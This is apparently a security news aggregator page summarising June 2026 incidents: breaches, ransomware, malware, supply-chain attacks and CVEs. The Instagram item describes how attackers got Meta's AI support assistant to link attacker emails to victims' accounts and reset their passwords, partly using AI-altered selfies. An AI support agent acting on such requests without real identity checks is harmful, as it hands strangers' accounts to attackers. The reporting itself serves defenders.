Breaches & Data LeaksRansomwareHealthcareSynnovisMid and South Essex NHS Foundation TrustNHS
Mid and South Essex NHS Foundation Trust says the 2024 Qilin ransomware attack on pathology provider Synnovis exposed about 2,380 records tied to specialist diagnostic testing, and the total may rise as records are matched to individual patients. The incident is the same long-running data theft and service-disruption event that hit NHS pathology services in southeast London on June 3, 2024; patient data was later published after failed extortion, and affected trusts are still identifying who must be notified.
Why it matters: This shows the fallout from a major healthcare ransomware breach is still growing years later, with more patients and hospitals discovering exposed records. Affected NHS organizations need to keep tracing exposed data and notifying people, while patients contacted about past diagnostic testing should treat breach notices seriously and watch for scams or misuse of their information.
Sources
2026.06.09 100%
The article establishes a trackable development in the Synnovis/Qilin NHS breach by adding a newly confirmed affected trust and record count, showing the incident's victim scope is still expanding.
Full page
EFF says Meta smart glasses app contains active facial-recognition code that can identify people from stored faceprints
1D ago 2 sources
Surveillance & PrivacyTechnology & SoftwareConsumers & General PublicMeta
EFF and Wired report that Meta has shipped facial-recognition code in the software for its always-on smart glasses, potentially affecting people both using the glasses and those seen by them. EFF says static analysis confirmed code that stores faceprints as 2,048-value templates and compares newly seen faces against a local database; researchers also showed the feature could be triggered in testing by manually adding a face in debug mode, though it is not yet exposed as a consumer setting.
Why it matters: This is a significant surveillance and privacy story because it suggests consumer wearables may already contain hidden person-identification features before any public rollout. People considering Meta glasses should weigh the privacy risk, and policymakers and civil-society groups may press Meta for transparency, safeguards, or limits before deployment.
Sources
Rindala Alajaji 2026.06.08 97%
This is a direct update to the same underlying event: after the earlier reporting that Meta's smart-glasses app contained active facial-recognition code, EFF now says Meta's June 5 app update removed the face-recognition components, including recognition alerts, biometric-signature handling, and related models/databases.
Cooper Quintin 2026.06.04 100%
This article establishes a new story by documenting previously unreported facial-recognition functionality in Meta's smart-glasses software, with independent technical confirmation rather than merely opinion or advocacy.
Full page
Suspected North Korean phishing campaign sends fake developer job offers to steal credentials and cryptocurrency
1D ago 1 sources
Social Engineering & PhishingMalwareThreat Actors & APTsScams & FraudTechnology & SoftwareCryptocurrency & BlockchainGitHubVisual Studio CodeCursor
A likely North Korean-linked group sent more than 250 fake job and code-review emails to developers at nearly 100 organizations, mainly in the United States, to steal login credentials and cryptocurrency wallets. Proofpoint tracks the activity as UNK_DeadDrop and says the attackers used spoofed company brands and attacker-controlled GitHub repositories posing as coding tests or crypto projects; victims were told to clone and open the repos in tools such as Visual Studio Code or Cursor, triggering cross-platform malware on macOS, Linux, and Windows.
Why it matters: Developers and the companies that employ them are the direct targets, and a single successful lure can expose source code, cloud access, and crypto assets. Organizations should warn staff about unsolicited recruiting emails, scrutinize GitHub-based coding tests, and isolate or block unknown repositories and scripts.
Sources
2026.06.08 100%
This article appears to be the first tracked report establishing Proofpoint's UNK_DeadDrop campaign as a distinct, likely DPRK-linked operation using fake job offers and code-review lures against developers.
Full page
NFCShare Android malware uses fake banking app updates on GitHub to steal payment card data from European bank customers
1D ago 1 sources
MalwareSocial Engineering & PhishingScams & FraudFinance & BankingTechnology & SoftwareConsumers & General PublicGitHubAndroid
Attackers are tricking bank customers into installing fake Android banking app updates from GitHub so they can steal card data and PINs. D3Lab says newer NFCShare variants, seen since May 14, target banks mainly in Italy and Spain after victims visit phishing sites impersonating real banks. The malware abuses near-field communication (NFC) on Android to read card details via IsoDep and EMV commands, then sends the data to command-and-control servers over WebSocket.
Why it matters: This can lead directly to payment-card fraud because victims are persuaded to hand over both card details and their PIN during a fake security check. Android users should only install banking apps from Google Play and treat any request to scan a bank card with their phone or sideload an update from GitHub as suspicious.
Sources
Bill Toulas 2026.06.08 100%
This article establishes a concrete, current NFCShare campaign expansion, including new GitHub-hosted delivery infrastructure, broader bank targeting in Europe, and updated technical details on how the malware steals card data.
Full page
SoFi says a third-party vendor breach exposed customer data at its Hong Kong securities unit
2D ago 1 sources
Breaches & Data LeaksFinance & BankingSoFiSoFi Securities (Hong Kong)
SoFi says hackers got into a database used by SoFi Securities (Hong Kong) Limited through a third-party vendor, potentially exposing customer information. The company said it detected the unauthorized access on April 30, 2026 and is still investigating what data and how many customers were affected. SoFi has not named the vendor, disclosed the attack method, or said whether extortion was involved.
Why it matters: Customers of SoFi Hong Kong could face phishing, fraud, or account-targeting attempts even though the full scope is still unknown. Affected users should be cautious of unsolicited messages, change passwords, enable two-factor authentication where available, and closely monitor financial accounts.
Sources
Lawrence Abrams 2026.06.08 100%
This article appears to be the first tracked report confirming SoFi's disclosure of the vendor-related breach at its Hong Kong subsidiary and establishing the core facts of the incident.
Full page
Freedom of the Press Foundation sues DOJ for records on alleged concealment of press protections in FBI raid on Washington Post reporter Hannah Natanson
2D ago 1 sources
Information FreedomSurveillance & PrivacyPolicy & RegulationGovernmentMedia & EntertainmentNonprofits & NGOsLegal & Professional ServicesDOJFBIWashington PostFreedom of the Press Foundation
Freedom of the Press Foundation sued the U.S. Department of Justice under the Freedom of Information Act to uncover whether DOJ hid legal protections for journalists when it sought a warrant to raid Washington Post reporter Hannah Natanson’s home. The suit centers on the Privacy Protection Act of 1980, which generally bars newsroom and journalist-home searches, and follows a judge’s February finding that DOJ’s omission of the law from the warrant process seriously undermined confidence in the government’s disclosures.
Why it matters: This matters to journalists, sources, and the public because it suggests federal investigators may be sidestepping legal safeguards meant to stop raids on reporters. The case could reveal whether the Natanson raid was an isolated abuse or part of a broader DOJ practice with implications for press freedom and government surveillance powers.
Sources
Lauren Harper 2026.06.08 100%
This article establishes a distinct new development: a federal FOIA lawsuit seeking records on whether DOJ systematically concealed the Privacy Protection Act from judges in journalist-search warrant cases tied to the Hannah Natanson raid.
Full page
Russia-linked Matryoshka disinformation campaign targeted Armenia’s 2026 election with fake news, bot networks, and hoax bomb threats
2D ago 1 sources
Disinformation & Influence OpsGovernmentMedia & EntertainmentConsumers & General PublicGovernment of Armenia
Researchers and Armenian authorities say a large Russia-linked influence operation targeted Armenia’s parliamentary election with fake stories, manipulated videos, bot amplification, and false bomb threats at polling stations. Antibot4Navalny and the Institute for Strategic Dialogue linked the activity to the Matryoshka campaign, described as part of Russia’s broader Doppelganger operation, which impersonates trusted media and government sources to spread propaganda and election-related falsehoods over an eight-month period.
Why it matters: This is the kind of coordinated deception campaign that can mislead voters, intimidate the public, and erode trust in elections even without hacking voting machines. Platforms, journalists, election officials, and civil society groups should watch for cloned media sites, impersonation, bot-driven amplification, and hybrid tactics such as hoax threats around major votes.
Sources
2026.06.08 100%
The article establishes a distinct, concrete election interference event in Armenia tied to the Matryoshka/Doppelganger Russia-linked influence apparatus, with specific tactics, timing, and impact.
Full page
Zcash fixes critical Orchard privacy-pool flaw that could have let attackers create fake ZEC
2D ago 1 sources
Zero-Days & CVEsUrgent PatchesCryptocurrency & BlockchainConsumers & General PublicZcash
Zcash fixed a critical vulnerability in its Orchard shielded transaction system that could have allowed attackers to generate counterfeit ZEC while transactions still appeared valid. Security researcher Taylor Hornby found the issue on May 29 while auditing Orchard; the bug was a failed transaction-input validation check in the zero-knowledge proof workflow, affecting the Orchard privacy pool introduced in 2022. No CVE is cited, and it is unclear whether the flaw was exploited before the fix.
Why it matters: This is the kind of bug that can undermine trust in a cryptocurrency by allowing undetectable fraudulent coin creation. Zcash users, exchanges, and infrastructure operators should confirm they are running the patched software and watch for any follow-up guidance on possible past exploitation.
Sources
Bruce Schneier 2026.06.08 100%
This article establishes a new tracked story because it reports the discovery and remediation of a previously unknown, critical Zcash protocol vulnerability with potential ecosystem-wide financial impact, and no existing tracked story covers this event.
Full page
Unpatched Gogs zero-day lets attackers run code on self-hosted Git servers
2D ago 5 sources
Urgent PatchesSupply ChainZero-Days & CVEsTechnology & SoftwareGogs
A newly disclosed flaw in Gogs can let attackers take over internet-exposed code servers if they can register a normal user account. The unpatched argument-injection vulnerability, not yet assigned a CVE, affects Gogs 0.14.2 and 0.15.0+dev and is triggered during the "Rebase before merging" pull-request flow; because open registration is enabled by default, many default-configured servers may be reachable by unauthenticated attackers who simply sign up first. Rapid7 says successful exploitation can lead to remote code execution as the server process user, access to private repositories, and theft of password hashes, API tokens, SSH keys, and 2FA secrets.
Why it matters: Organizations running self-hosted Gogs should treat this as urgent because exposed servers may be compromiseable even without an existing attacker account. Until a fix is available, admins should disable open registration, restrict internet exposure, and review whether rebase-merging can be turned off or tightly limited.
Sources
Sergiu Gatlan 2026.06.08 98%
This article is a direct update to the same Gogs argument-injection zero-day: it adds that Gogs released version 0.14.3 on June 7 to fix the flaw, requested a CVE, and published concrete mitigations for users who cannot patch immediately.
2026.05.29 98%
This article is the same underlying Gogs zero-day event and adds that there is still no official fix, Rapid7 has now published a Metasploit exploit module, the researcher says maintainers stopped responding after March 28, and a proposed patch has been submitted while users are urged to disable registration and rebase merging.
Ionut Arghire 2026.05.29 98%
This article is a direct report on the same Gogs zero-day event, adding technical detail from Rapid7 on the argument-injection root cause, the 'Rebase before merging' attack path via malicious branch names, default open registration risk, cross-platform impact, lack of a patch, and the release of a Metasploit module and indicators of compromise.
info@thehackernews.com (The Hacker News) 2026.05.28 97%
This article appears to cover the same underlying Gogs authenticated remote code execution issue, adding another report that characterizes it as critical and exploitable by any authenticated user on affected self-hosted servers.
Sergiu Gatlan 2026.05.28 100%
This article establishes a distinct new Gogs zero-day event: a newly disclosed, unpatched remote-code-execution flaw in current Gogs releases, separate from the earlier CVE-2025-8110 zero-day mentioned only as background.
Full page
Chained UniFi OS Server flaws CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910 can give attackers root access without logging in
2D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicUbiquiti
Researchers say attackers can take over vulnerable UniFi OS Server systems without a password and gain full root control. Bishop Fox showed that three patched bugs in UniFi OS Server 5.0.6 and earlier—CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910—can be chained from the network to bypass authentication, read files, and trigger command injection, leading to remote code execution and trivial privilege escalation via passwordless sudo.
Why it matters: UniFi OS Server can manage core business systems such as networking, cameras, and door access, so compromise can hand attackers broad control of an organization’s environment. Organizations using affected versions should patch immediately and check for suspicious requests to the noted endpoints, because the attack leaves little or no login evidence.
Sources
Bill Toulas 2026.06.08 100%
This article establishes a distinct story by surfacing a newly detailed exploit chain and defender guidance for three UniFi OS Server CVEs that together enable unauthenticated root-level remote code execution.
Full page
Ransomware attack shuts Evanston Township High School in Illinois and disrupts summer programs
2D ago 1 sources
RansomwareEducationEvanston Township High SchoolFBI
A ransomware attack forced Evanston Township High School in Illinois to close for at least two days, canceling summer school, sports camps, and other on-campus activities. The school said phone systems are down and staff have limited access to email, Google accounts, and other network systems including eSchool. External forensics specialists and breach counsel were engaged, and the FBI is involved. No ransomware group has publicly claimed responsibility yet.
Why it matters: This is a real-world operational disruption affecting students, families, and staff, not just an IT outage. Schools and local governments should review incident response readiness, offline recovery options, and communications plans, while affected families should watch for follow-up notices about any data exposure.
Sources
2026.06.08 100%
The article establishes a distinct incident at Evanston Township High School with confirmed ransomware, active recovery, and school closures.
Full page
Powys Council says cyberattack affected 13 schools in Wales and exposed some staff and pupil data
2D ago 1 sources
Breaches & Data LeaksGovernmentEducationPowys County Council
A separate cyberattack in Powys, Wales affected systems used by 13 schools, and the council says personal data belonging to staff and pupils was accessed. Current information indicates data was taken from one of the affected schools, but officials have not named the schools involved, the number of people affected, or the exact data types because of the sensitivity of the incident. The council has not confirmed ransomware or identified the attacker.
Why it matters: This affects children, school staff, and families, and may carry identity-fraud and privacy risks even though schools remain open. People connected to Powys schools should monitor official notifications and be cautious about phishing or scam messages that use school-related details.
Sources
2026.06.08 100%
The article introduces a separate, clearly scoped Wales school-sector breach with confirmed unauthorized access to personal data and no matching tracked story.
Full page
Russia updates SORM surveillance rules to expand automated tracking of citizens' online activity
2D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareTelecommunicationsConsumers & General PublicRoskomnadzor
Russia has updated the technical rules for its SORM surveillance system, expanding how authorities can search and connect people's internet and communications data. The new regulations require broader collection, processing, and transmission of identifiers including names, passport and tax numbers, addresses, usernames, domains, URLs, device identifiers, and geolocation data. The rules apply beyond telecom carriers to other online service operators and increase compliance burdens on providers.
Why it matters: This matters because it strengthens Russia's ability to monitor individuals without shutting the internet off, making targeted repression and self-censorship easier while pressuring providers to integrate with state surveillance systems. The impact is immediate for people and companies operating in Russia, especially telecom and internet services that may need to change infrastructure or face regulatory penalties.
Sources
2026.06.08 100%
The article centers on a specific new regulatory change published by Russia's Ministry of Digital Development that upgrades SORM's data-search and integration requirements, establishing a distinct surveillance-policy story not represented in the existing tracked items.
Full page
Mini Shai-Hulud supply-chain attack compromises 320+ npm packages in @antv namespace via stolen maintainer account
2D ago 5 sources
Supply ChainMalwareThreat Actors & APTsTechnology & SoftwareCryptocurrency & BlockchainnpmGitHubMicrosoft
Researchers say a compromised npm maintainer account ('atool') was used to publish hundreds of malicious package versions across the @antv namespace, including downstream widely used packages such as echarts-for-react and timeago.js. The payload steals GitHub Actions secrets and credentials from cloud, Kubernetes, Vault, wallet, and developer-tool paths, exfiltrates data via GitHub and fallback infrastructure, and can republish tampered packages using stolen npm tokens. Reports also link the campaign to malicious PyPI uploads, a compromised GitHub Action, and a VS Code extension.
Why it matters: This is a high-impact ecosystem compromise with downstream risk to developer workstations, CI environments, and software consumers through trusted package updates. Defenders should immediately identify affected package versions, rotate exposed secrets and npm tokens, review CI runners and GitHub repositories for exfiltration, and block known malicious artifacts.
Sources
2026.06.08 63%
This article ties the Microsoft GitHub repository compromises to the broader Mini Shai-Hulud/Miasma worm ecosystem, adding that a descendant worm was used to push malicious commits into more than 70 Microsoft repositories and break Azure-related CI/CD workflows.
2026.06.01 60%
The article says the Red Hat compromise used a Mini Shai-Hulud variant and notes the malware was recently open-sourced, which connects it technically to the broader Mini Shai-Hulud campaign, but this is a distinct compromise affecting different packages, accounts, and victims.
Ionut Arghire 2026.05.20 100%
The article establishes a distinct new Mini Shai-Hulud campaign centered on a compromised npm maintainer account and malicious releases across the @antv ecosystem, rather than updating one of the existing tracked stories.
2026.05.18 78%
This article extends the same broader Shai-Hulud/TeamPCP npm supply-chain campaign by reporting a copycat worm in a new package (chalk-tempalte) plus three additional malicious npm packages from the same actor, including stealers and a DDoS bot component, shortly after TeamPCP open-sourced the worm.
2026.05.18 41%
The article says the TanStack compromise used code from the Shai-Hulud worm published by TeamPCP, providing additional context on the malware family and tradecraft, but the core event here is the TanStack attack rather than the @antv compromise itself.
Full page
Attackers exploit Everest Forms Pro WordPress plugin flaw CVE-2026-3300 to take over sites
2D ago 2 sources
Zero-Days & CVEsTechnology & SoftwareConsumers & General PublicWordPressEverest Forms
Hackers are actively exploiting a critical bug in the Everest Forms Pro WordPress plugin to seize control of vulnerable websites. The flaw, CVE-2026-3300, affects Everest Forms Pro 1.9.12 and earlier and allows unauthenticated remote code execution through the plugin’s Complex Calculation feature, which unsafely passes form input into PHP eval(). Wordfence says attacks began by April 13 and are creating rogue administrator accounts, including one named “diksimarina.”
Why it matters: Affected WordPress sites can be fully hijacked without a login, allowing attackers to add admin users, install backdoors, and alter site content. Site owners should update immediately, review administrator accounts and logs for suspicious activity, and check for indicators tied to the reported campaign.
Sources
Ionut Arghire 2026.06.08 98%
This article is the same underlying event and adds detail that exploitation began on April 13, Defiant blocked over 29,000 attempts, the attacks often created an admin account named 'diksimarina', and the bug stems from unsafe handling in the Complex Calculation feature despite a March patch in version 1.9.13.
Bill Toulas 2026.06.06 100%
This article establishes a distinct new story around active exploitation of CVE-2026-3300 in Everest Forms Pro, including affected versions, exploitation details, attacker behavior, and defender guidance.
Full page
Lansing Community College says 174,000 people were affected by a 2025 breach using compromised credentials
2D ago 1 sources
Breaches & Data LeaksEducationConsumers & General PublicLansing Community College
Lansing Community College says hackers got into some of its systems in February 2025 and exposed personal information belonging to more than 174,000 people. The school says the intrusion began with compromised credentials and affected data can include names, addresses, dates of birth, driver's license details, and Social Security numbers, with the exact data varying by person. LCC says it found the incident about a week after the access began and has not identified the threat actor publicly.
Why it matters: This is a large education-sector breach involving identity data that can be used for fraud, tax scams, and account takeover. Affected people should watch for notice letters, enroll in credit monitoring, and consider fraud alerts or credit freezes.
Sources
Ionut Arghire 2026.06.08 100%
This article appears to be the initial broad public reporting of Lansing Community College's disclosure, including victim count, attack timing, access method, and the categories of personal data exposed.
Full page
Oxford University says CareerConnect breach at supplier Group GTI exposed user names, emails, and some passwords
2D ago 2 sources
Social Engineering & PhishingSupply ChainBreaches & Data LeaksEducationTechnology & SoftwareOxford UniversityGroup GTITargetConnect
Oxford University says a separate breach at its CareerConnect jobs platform exposed users’ full names and email addresses, and encrypted passwords for people not using single sign-on. The affected service is provided by Group GTI and runs on its TargetConnect platform, which Oxford said was compromised on May 28 through an unspecified security vulnerability that has since been fixed; affected alumni, research staff, and employer users had passwords reset, and GTI has not publicly disclosed the flaw or total scope.
Why it matters: Students, alumni, staff, and recruiters who used the platform may now face phishing or credential-stuffing attempts, especially if they reused passwords elsewhere. Affected users should reset reused passwords, watch for convincing job-related scam emails, and universities using GTI TargetConnect should press the vendor for technical details and mitigation guidance.
Sources
Sergiu Gatlan 2026.06.08 99%
This article is the same underlying event: Oxford's disclosure that Group GTI's CareerConnect platform was compromised on May 28, exposing names, email addresses, and encrypted passwords for some non-SSO users. It adds Oxford's warning that the intrusion appeared focused on gathering credentials for later phishing and confirms GTI invalidated affected locally set passwords.
2026.06.06 100%
This article establishes a distinct new breach event: an intrusion into Oxford's third-party careers platform provider Group GTI/TargetConnect, explicitly separate from the earlier Canvas incident.
Full page
FBI warns Silent Ransom Group is sending fake IT workers in person to law firms to plug in USB drives and steal data
2D ago 7 sources
Threat Actors & APTsRansomwareScams & FraudSocial Engineering & PhishingBreaches & Data LeaksLegal & Professional ServicesFBI
The FBI says Silent Ransom Group is targeting U.S. law firms by pretending to be IT support, then stealing data and extorting victims without encrypting files. In 2026 attacks, the group reportedly used callback phishing emails, phone-based social engineering, remote desktop access, and in some cases sent an operative on site to insert a USB or external drive after a failed remote-access attempt; the attackers then used tools such as WinSCP and Rclone to exfiltrate data.
Why it matters: Law firms and other organizations should treat unsolicited IT calls, emails, and in-person support visits as potential attack vectors, not just remote phishing. The warning is urgent because the attackers use legitimate admin tools and leave few traces, so organizations should verify IT identities, restrict external-drive use, and harden remote-access workflows now.
Sources
Ionut Arghire 2026.06.08 84%
This updates the same underlying Silent Ransom Group campaign targeting U.S. law firms. It adds new reporting that the group is using DNS fast flux infrastructure, with compromised IoT/CPE devices across 18 countries and domains including ep6pheij[.]com and business-data-leaks[.]com, alongside the previously reported vishing, remote-access, and in-person USB tactics.
Lawrence Abrams 2026.06.07 96%
This article covers the same Silent Ransom Group campaign against U.S. law firms and adds Mandiant’s technical details on the attack chain: invoice-themed precursor emails, follow-up fake IT support calls, use of Teams/Zoom/Quick Assist/Terminal Services, deployment of remote-management tools like AnyDesk and Zoho Assist, phishing domain patterns, use of Privnote, and rapid data theft and extortion timelines.
2026.06.05 96%
This article covers the same underlying Silent Ransom Group/UNC3753 campaign and adds Mandiant reporting that dozens of banks, law firms, and professional-services firms were targeted from January through May 2026, that the group is also tracked as Luna Moth and Chatty Spider, and that Mandiant observed very rapid operations with data theft and extortion sometimes beginning within an hour.
2026.05.27 97%
This article is a direct report on the same FBI advisory, adding detail that fresh in-person incidents were reported in Spring 2026 and describing the crew's tactics, including impersonating IT staff, using callback phishing, remote desktop access, WinSCP, disguised Rclone, and cloud file-sharing services to steal data for extortion.
2026.05.27 98%
This article directly reports the same FBI advisory on Silent Ransom Group (also Luna Moth/UNC3753) targeting U.S. law firms with phishing, fake help-desk calls, remote-access social engineering, and in-person visits to copy data onto USB or hard drives. It adds context that the group is linked to the defunct Conti syndicate, has targeted law firms since 2023, and uses trusted tools and cloud services like OneDrive and Google Drive to blend in.
Sergiu Gatlan 2026.05.27 99%
This article is the same underlying event: the FBI flash alert on Silent Ransom Group's in-person and remote social-engineering attacks against U.S. law firms. It adds detail that SRG first tries phone and phishing lures to obtain remote desktop access, then may dispatch someone on-site to connect USB or external drives if that fails, and reiterates links to Luna Moth/UNC3753 and prior callback-phishing activity.
Ionut Arghire 2026.05.27 100%
This article appears to establish a distinct FBI-tracked development in Silent Ransom Group tradecraft: in-person operatives physically inserting devices to support data theft and extortion targeting law firms.
Full page
CISA says attackers are exploiting SolarWinds Serv-U denial-of-service flaw CVE-2026-28318
2D ago 3 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareSolarWindsCISA
CISA says hackers are now actively exploiting a recently patched SolarWinds Serv-U bug to crash exposed file-transfer servers. The flaw, CVE-2026-28318, affects SolarWinds Serv-U MFT and FTP software on Windows and Linux and can be triggered without authentication using specially crafted POST requests with Content-Encoding: deflate; SolarWinds fixed it in Serv-U 15.5.4 Hotfix 1 and advised admins who cannot patch to restrict access and block such requests.
Why it matters: Organizations running internet-exposed Serv-U servers could face service outages right now, including federal agencies ordered to remediate by June 19. If you use Serv-U, patch immediately or apply SolarWinds' temporary filtering and access restrictions while checking for signs of attempted abuse.
Sources
Ionut Arghire 2026.06.08 98%
This is the same underlying event: active exploitation of SolarWinds Serv-U CVE-2026-28318. The article adds patch timing details, notes the fix is Serv-U 15.5.4 Hotfix 1, explains the unauthenticated specially crafted POST request with the 'Content-Encoding: deflate' header, and reiterates affected/EoL versions and CISA's June 19 federal patch deadline.
info@thehackernews.com (The Hacker News) 2026.06.06 99%
It covers the same underlying event: CISA adding the actively exploited SolarWinds Serv-U flaw CVE-2026-28318 to the Known Exploited Vulnerabilities catalog, reinforcing the exploitation status and remediation urgency for affected organizations.
Sergiu Gatlan 2026.06.05 100%
This article establishes a new tracked story because it is the first item here tying SolarWinds Serv-U CVE-2026-28318 to active exploitation and CISA KEV inclusion.
Full page
Attackers used Meta’s Instagram AI support bot to reset passwords and hijack accounts
2D ago 6 sources
Breaches & Data LeaksSocial Engineering & PhishingGovernmentDefense & AerospaceTechnology & SoftwareConsumers & General PublicMetaInstagramObama White HouseU.S. Space Force
Attackers used Meta’s automated Instagram support assistant to take over accounts, including the Obama White House account and the U.S. Space Force chief master sergeant account, and briefly deface them with pro-Iran messages. According to KrebsOnSecurity and Telegram posts cited in the report, the abuse involved the password-recovery flow: attackers asked the AI bot to add a new email address to a target account, then used the one-time code sent there to reset the password. No CVE is given, Meta reportedly pushed an emergency patch, and accounts with multi-factor authentication enabled were said to resist the takeover.
Why it matters: This matters because it shows AI-driven customer support can become a new social-engineering path to account takeover even without a backend database breach. Instagram users, especially high-value or public-facing accounts, should enable multi-factor authentication now and review account recovery email addresses and recent login activity.
Sources
Eduard Kovacs 2026.06.08 98%
This is the same underlying event: abuse of Meta’s AI-powered Instagram account recovery/support workflow to reset passwords and hijack accounts. It adds Meta’s disclosure that 20,225 accounts were potentially affected, the discovery date (May 31), a precise explanation of the email-verification bug in the High Touch Support tool, and remediation steps including disabling the tool, invalidating reset links, and forcing security checkpoints.
Sergiu Gatlan 2026.06.08 99%
This is the same underlying event: abuse of Meta's High Touch Support AI-assisted Instagram recovery flow to issue password reset links and hijack accounts. The article adds Meta's breach disclosure, an estimated impact of over 20,000 stolen accounts, timeline details including discovery on May 31 and breach activity dating to April 17, and Meta's response steps such as disabling HTS, invalidating reset links, and requiring account re-authentication.
Bruce Schneier 2026.06.04 98%
This is the same underlying event: attackers abused Meta’s Instagram AI support assistant to add attacker-controlled email addresses, receive verification codes, and trigger password resets for victim accounts; this source adds that Meta spokesperson Andy Stone said the issue was fixed.
Bill Toulas 2026.06.02 99%
This is the same underlying event: attackers abused Meta’s AI-powered Instagram support and recovery process to change account email addresses, bypass recovery safeguards including selfie verification and reportedly 2FA, and hijack high-value accounts such as the Obama White House account. This source adds reporting on victims being trapped in AI-only recovery loops, claims that AI-generated animated selfies were accepted for identity checks, and Meta communications VP Andy Stone’s statement that the issue was resolved and impacted accounts were being secured.
Ionut Arghire 2026.06.02 99%
This article covers the same underlying event and adds specifics on the attack path: a confused-deputy logic flaw in Meta’s AI-powered recovery assistant let attackers relink victim accounts to new email addresses, use VPNs to mimic victims’ locations, sometimes submit AI-modified selfies, and then reset passwords without effective 2FA blocking. It also says Meta has now fixed the issue.
BrianKrebs 2026.06.01 100%
This article appears to be the first concrete report tying a specific Meta AI support-bot recovery flaw to real Instagram account hijackings and visible defacements.
Full page
C0XMO Gafgyt botnet exploits DD-WRT router flaw CVE-2021-27137 to spread across routers and IoT devices
3D ago 1 sources
MalwareThreat Actors & APTsZero-Days & CVEsTechnology & SoftwareTelecommunicationsConsumers & General PublicDD-WRT
A new botnet called C0XMO is infecting DD-WRT routers and other internet-connected devices so they can be used in denial-of-service attacks. Fortinet says the malware exploits CVE-2021-27137, an unauthenticated buffer overflow in DD-WRT, and also brute-forces Telnet and SSH logins while carrying binaries for multiple CPU architectures including ARM, MIPS, PowerPC, x86, and x86_64. The botnet establishes persistence with cron jobs and startup-file changes, then removes rival malware and tooling from infected systems.
Why it matters: Organizations and users with exposed routers, DVRs, and similar devices may be silently pulled into a botnet and used in attacks. Patch affected firmware where available, disable unnecessary remote administration, and change weak or reused device credentials immediately.
Sources
Bill Toulas 2026.06.07 100%
This article appears to be the first tracked item establishing the C0XMO botnet campaign and its use of CVE-2021-27137 in DD-WRT devices.
Full page
Polyfill.io remnants trigger rogue login prompts on Toshiba, Muji and other websites
5D ago 1 sources
Supply ChainSocial Engineering & PhishingManufacturingRetail & E-CommerceTechnology & SoftwareConsumers & General PublicToshibaMujiPolyfill.io
Toshiba and Muji warned that visitors to some of their web pages saw unexpected browser sign-in prompts that could trick people into entering credentials. The prompts were tied to lingering references to the compromised polyfill.io JavaScript content delivery network (CDN), which began responding with HTTP 401 authentication challenges in late May 2026; affected companies removed or suspended the service, and no confirmed credential theft has been reported so far.
Why it matters: People who entered usernames or passwords into these pop-ups should change them, and website owners should remove any remaining polyfill.io code immediately. This matters because it shows how a long-abandoned third-party script can still create phishing risk years after an earlier supply-chain compromise.
Sources
Bill Toulas 2026.06.05 100%
This article establishes a distinct 2026 follow-on event from the earlier Polyfill compromise: dormant polyfill.io inclusions on live sites caused browser credential prompts on major websites, creating a fresh user-facing phishing risk.
Full page
China-linked UNC5221 used Brickstorm, Plenet and AgentPSD malware to keep long-term access to victim networks and Microsoft 365
5D ago 1 sources
Threat Actors & APTsMalwareTechnology & SoftwareLegal & Professional ServicesMicrosoftEgnyteNetgateSynology
A China-linked espionage group kept access to a victim organization and its managed services provider for at least 18 months, using multiple backdoors to return even after cleanup. Volexity says UNC5221, also tracked as VerdantBamboo, used Brickstorm on Egnyte Storage Sync, pfSense, Synology NAS and a retired Linux email server, then used Plenet (also called Grimbolt) and AgentPSD to maintain persistence and reach the victim’s Microsoft 365 environment through stolen credentials and SSL VPN access. No new CVE is named in this report.
Why it matters: Organizations using Microsoft 365, MSPs, and internet-facing edge devices should treat this as a reminder that sophisticated attackers can survive remediation and re-enter through trusted providers. Review VPN and firewall changes, hunt for Brickstorm/Plenet/AgentPSD, audit MSP access paths, and rotate credentials and tokens tied to compromised systems.
Sources
Bill Toulas 2026.06.05 100%
This article establishes a distinct incident report on UNC5221/VerdantBamboo intrusions, adding newly documented malware and concrete details about persistence through an MSP and Microsoft 365 access rather than updating one of the existing tracked stories.
Full page
Suspected Iranian hackers accessed internet-exposed gas station tank monitors across multiple U.S. states
5D ago 4 sources
Policy & RegulationInformation FreedomUrgent PatchesThreat Actors & APTsEnergy & UtilitiesRetail & E-CommerceCISA
U.S. officials believe suspected Iranian hackers broke into fuel-tank monitoring systems at gas stations in several states. The attackers targeted automatic tank gauges, or ATG systems, that were exposed online without passwords and changed displayed readings but reportedly could not alter actual fuel volumes. No physical damage has been reported, but officials warned the access could potentially hide leaks or create other safety and critical-infrastructure risks.
Why it matters: Gas stations and operators using older internet-connected monitoring gear may be at risk right now, especially if devices are reachable online without authentication. Operators should immediately remove ATG systems from direct internet exposure, require passwords, and review logs and display anomalies.
Sources
Sergiu Gatlan 2026.06.05 96%
This is a direct update on the same ATG gas-station tank-monitoring intrusion wave, adding the joint CISA/FBI/NSA advisory, details on likely attack methods, and Shadowserver's count of 1,061 exposed ATG systems globally, including 909 in the U.S.
SecurityWeek News 2026.06.05 76%
It ties the broader multi-agency U.S. warning on exposed Automatic Tank Gauge systems to the previously reported Iran-linked compromises of gas-station tank monitors and reiterates the immediate mitigation guidance to disconnect exposed systems from the internet.
Lawrence Abrams 2026.06.03 94%
This is a direct government follow-up to the same tank-monitoring intrusion activity previously reported by CNN, adding an official multi-agency advisory, broader sector impact beyond gas stations, and specific attack methods and mitigations. It also notes the activity remains unattributed in the advisory despite earlier reporting pointing to suspected Iranian involvement.
SecurityWeek News 2026.05.22 100%
This article establishes a distinct critical-infrastructure intrusion story involving suspected Iranian access to exposed gas station ATG systems across multiple states.
Full page
European Commission proposes tech sovereignty package covering chips, cloud, AI and open-source security
5D ago 1 sources
Policy & RegulationSupply ChainGovernmentTechnology & SoftwareManufacturingEuropean Commission
The European Commission unveiled a new tech sovereignty package meant to reduce the European Union's dependence on U.S. and Chinese technology suppliers. The package includes draft laws for semiconductors and cloud and AI infrastructure, plus an Open Source Strategy that would fund maintenance and security for critical open-source components and push public-sector procurement toward open technologies as part of broader digital resilience planning.
Why it matters: This matters to governments, public-sector buyers, vendors, and defenders because it could reshape which technologies Europe relies on for critical systems and how security funding is directed, especially for open-source components that underpin widely used infrastructure. Organizations should watch the legislative process, procurement changes, and any resulting security requirements for cloud, AI, and software supply chains.
Sources
2026.06.05 100%
This article establishes a new story around the EU's specific 2026 tech sovereignty legislative package and strategy rollout, rather than updating an existing tracked event.
Full page
Microsoft links GPU cryptojacking malware campaign to poisoned search results and AI chatbot software recommendations
5D ago 2 sources
